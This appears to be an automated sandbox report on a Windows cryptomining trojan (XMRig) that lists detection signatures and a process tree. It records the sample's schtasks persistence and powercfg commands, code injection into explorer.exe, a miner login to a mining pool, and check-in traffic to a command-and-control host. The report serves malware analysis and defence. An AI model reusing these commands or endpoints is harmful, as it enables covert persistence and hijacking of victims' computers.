
Windows Analysis Report
ft1i6jvAdD.exe

Overview

General Information

Sample name: ft1i6jvAdD.exe (renamed because original name is a hash value)
Original sample name: b03c2d7df7eabc44f36397cb66ac3e77.exe
Analysis ID: 1411192
MD5: b03c2d7df7eabc44f36397cb66ac3e77
SHA1: 486f521d16d96878a74ff9212cf2da5b184e0430
SHA256: 4489ff33e7a91c7485a1c1dd8a6102868e385f74fd8b5dbdbf4b505bbe9193b3
Tags: 64, exe, trojan

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
DNS related to crypt mining pools
Detected Stratum mining protocol
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ft1i6jvAdD.exe (PID: 7032 cmdline: C:\Users\user\Desktop\ft1i6jvAdD.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 6320 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6416 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6456 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6584 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4112 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • cmd.exe (PID: 7160 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6172 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2656 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6216 cmdline: cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fgfdgd.exe (PID: 6784 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 6244 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 6480 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6748 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6740 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6560 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7160 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6292 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6456 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6344 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fgfdgd.exe (PID: 3760 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 1716 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 4076 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3184 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1492 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5108 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4940 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 692 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 412 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5568 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fgfdgd.exe (PID: 1828 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 6212 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 6404 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6512 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6612 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6364 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6360 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6460 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4000 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6548 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • fgfdgd.exe (PID: 1668 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 1800 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
    • cmd.exe (PID: 1380 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: dump.pcap | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security

              Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ghghghg.exe, ParentProcessId: 7132, ParentProcessName: ghghghg.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6320, ProcessName: powercfg.exe

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, CommandLine: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6172, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, ProcessId: 2656, ProcessName: schtasks.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd, CommandLine: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\ft1i6jvAdD.exe, ParentImage: C:\Users\user\Desktop\ft1i6jvAdD.exe, ParentProcessId: 7032, ParentProcessName: ft1i6jvAdD.exe, ProcessCommandLine: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd, ProcessId: 7160, ProcessName: cmd.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc, CommandLine: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc, ProcessId: 6316, ProcessName: svchost.exe
Snort IDS alerts

Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
03/18/24-17:51:14.723704  2051004  49729        80                TCP       A Network Trojan was detected
03/18/24-17:51:14.723704  2011341  49729        80                TCP       A Network Trojan was detected
03/18/24-17:52:16.406978  2051004  49734        80                TCP       A Network Trojan was detected
03/18/24-17:52:16.406978  2011341  49734        80                TCP       A Network Trojan was detected
03/18/24-17:50:15.279061  2051004  49726        80                TCP       A Network Trojan was detected
03/18/24-17:50:15.279061  2011341  49726        80                TCP       A Network Trojan was detected

              AV Detection

Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | ReversingLabs: Detection: 55%
Source: ft1i6jvAdD.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Joe Sandbox ML: detected
Source: ft1i6jvAdD.exe | Joe Sandbox ML: detected

              Bitcoin Miner

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4112, type: MEMORYSTR
Source: unknown | DNS query: name: xmr-eu1.nanopool.org
Source: global traffic | TCP traffic: 192.168.2.12:49709 -> 162.19.224.121:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49pxa5cu5h8jnb4x6adm7vgfk4e8z11jb9ajxcfbc69wrzxfpjgnjfkfzltkm5w33fk3y1zyvjfjcedel5pdunzp1epmxhx","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: global traffic | TCP traffic: 192.168.2.12:49730 -> 54.37.137.114:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49pxa5cu5h8jnb4x6adm7vgfk4e8z11jb9ajxcfbc69wrzxfpjgnjfkfzltkm5w33fk3y1zyvjfjcedel5pdunzp1epmxhx","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: ft1i6jvAdD.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File opened: C:\Users\user\AppData\Local\Temp

              Networking

Source: Traffic | Snort IDS: 2051004 ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request 192.168.2.12:49726 -> 134.255.231.136:80
Source: Traffic | Snort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.12:49726 -> 134.255.231.136:80
Source: Traffic | Snort IDS: 2051004 ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request 192.168.2.12:49729 -> 134.255.231.136:80
Source: Traffic | Snort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.12:49729 -> 134.255.231.136:80
Source: Traffic | Snort IDS: 2051004 ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request 192.168.2.12:49734 -> 134.255.231.136:80
Source: Traffic | Snort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.12:49734 -> 134.255.231.136:80
Source: global traffic | TCP traffic: 192.168.2.12:49709 -> 162.19.224.121:10300
Source: global traffic | TCP traffic: 192.168.2.12:49730 -> 54.37.137.114:10300
Source: Joe Sandbox View | ASN Name: ACTIVE-SERVERSactive-serverscomDE
Source: Joe Sandbox View | ASN Name: CENTURYLINK-US-LEGACY-QWESTUS
Source: Joe Sandbox View | ASN Name: OVHFR
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: xmr-eu1.nanopool.org
Source: unknown | HTTP traffic detected:
    POST /api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 522
    Content-Type: application/json
    Host: cf-protected-l7.com
    User-Agent: cpp-httplib/0.12.6
Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.00000000013E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cf-protected-l7.com/api/endpoint.php
Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cf-protected-l7.com/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=
Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cf-protected-l7.com/api/endpoint.phpU
Source: explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cf-protected-l7.com/api/endpoint.phpe$U
Source: explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cf-protected-l7.com/api/endpoint.phptmsnnprpbvnfzokr
Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0

              System Summary

              barindex
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeFile created: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: fgfdgd.exe.6.drStatic PE information: No import functions for PE file found
              Source: ft1i6jvAdD.exeStatic PE information: No import functions for PE file found
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
